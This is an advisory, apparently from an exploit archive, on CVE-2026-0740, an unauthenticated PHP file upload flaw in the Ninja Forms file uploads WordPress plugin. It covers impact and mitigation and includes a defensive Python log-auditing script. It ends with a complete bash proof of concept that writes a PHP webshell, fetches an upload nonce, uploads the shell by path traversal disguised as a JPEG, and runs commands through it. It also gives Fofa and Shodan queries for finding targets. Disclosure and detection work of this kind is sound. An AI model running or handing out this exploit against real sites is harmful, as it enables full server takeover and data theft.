Ninja Forms Uploads – Unauthenticated PHP File Upload Vulnerability
The Ninja Forms Uploads vulnerability, identified as CVE-2026-0740, represents a significant security risk affecting users of the popular WordPress plugin, Ninja Forms. This vulnerability allows unauthenticated attackers to upload arbitrary PHP files to the server, potentially leading to a full compromise of the affected website.
Technical Details
This vulnerability arises from improper validation of file uploads within the Ninja Forms plugin. Specifically, the lack of sufficient access controls enables attackers to exploit the file upload feature without authentication. By crafting a malicious request, an attacker can upload a PHP file disguised as an innocuous file type, such as an image. Once uploaded, the PHP file can be executed on the server, allowing the attacker to run arbitrary code.
For instance, an attacker might send a POST request to the upload endpoint with a PHP shell script hidden within an image file. Upon successful upload, the attacker can then access the uploaded file via the web server, leading to potential data breaches, site defacement, or the installation of malware.
Impact
The consequences of this vulnerability can be severe. If exploited, it can lead to unauthorized access to sensitive data, complete server takeover, and even the distribution of malware to site visitors. Organizations relying on the Ninja Forms plugin may find their reputation damaged, face legal repercussions, and incur significant recovery costs.
Mitigation
To protect against CVE-2026-0740, organizations should take immediate action by updating the Ninja Forms plugin to the latest version, where this vulnerability has been patched. Additionally, implementing a web application firewall (WAF) can help filter out malicious requests before they reach the server.
Security professionals are advised to conduct regular security audits and vulnerability assessments to identify and remediate potential security weaknesses. Enforcing strict file upload validation rules and employing server-side controls can further mitigate the risk of unauthorized file uploads. Taking these proactive measures will enhance the overall security posture of WordPress installations utilizing Ninja Forms.
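One way to audit web-server logs for the access pattern described above (an added example, not part of the original advisory or its PoC): it flags successful requests for PHP files directly in /wp-content/ or under /wp-content/uploads/, and records whether the same client POSTed to admin-ajax.php shortly before. The Combined Log Format, the 10-minute correlation window and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# PHP requested directly in wp-content/ or anywhere under wp-content/uploads/.
# Plugin and theme directories are deliberately out of scope (legitimate PHP lives there).
SUSPECT_PHP = re.compile(r'^/wp-content/(?:uploads/[^?]*)?[^/?]+\.php(?:\?|$)', re.I)
ALLOWED = {"/wp-content/index.php"}   # placeholder file shipped with WordPress core
AJAX = "/wp-admin/admin-ajax.php"
WINDOW = timedelta(minutes=10)        # assumption: correlation window


def find_hits(lines):
    """Return (ip, path, preceded_by_ajax_post) for each successful suspect PHP request."""
    last_ajax_post, hits = {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                  # skip lines in another format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        bare = path.split("?", 1)[0]
        if m["method"] == "POST" and bare == AJAX:
            last_ajax_post[ip] = ts
        elif SUSPECT_PHP.match(path) and bare not in ALLOWED and m["status"] == "200":
            prev = last_ajax_post.get(ip)
            hits.append((ip, path, prev is not None and ts - prev <= WINDOW))
    return hits


SAMPLE = [  # constructed log lines, not taken from a real server
    '203.0.113.7 - - [09/Apr/2026:10:15:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 91 "-" "curl/8.5.0"',
    '203.0.113.7 - - [09/Apr/2026:10:15:02 +0000] "GET /wp-content/webshell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"',
    '198.51.100.20 - - [09/Apr/2026:11:00:00 +0000] "GET /wp-content/uploads/2026/04/cache.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Apr/2026:11:02:00 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Apr/2026:11:03:00 +0000] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, correlated in find_hits(SAMPLE):
        print(f"{ip} {path} ajax_post_before={correlated}")
```

A hit with the correlation flag set is the stronger signal; an uncorrelated hit still deserves a look, since PHP should not normally be served from these locations.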
Proof of Concept (PoC)
# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date: 2026-04-09
# Exploit Author: Sélim Lanouar (@whattheslime)
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://ninjaforms.com/extensions/file-uploads/
# Version: 3.3.24
# Tested on: WordPress (6.9.3) on Apache and Nginx servers
# CVE: CVE-2026-0740
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <target_url>"
exit 1
fi
target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php"
-d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php"
-F "action=nf_fu_upload"
-F "nonce=$nonce"
-F "form_id=$field_id"
-F "field_id=$field_id"
-F "image_jpg=../../../$file_name"
-F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"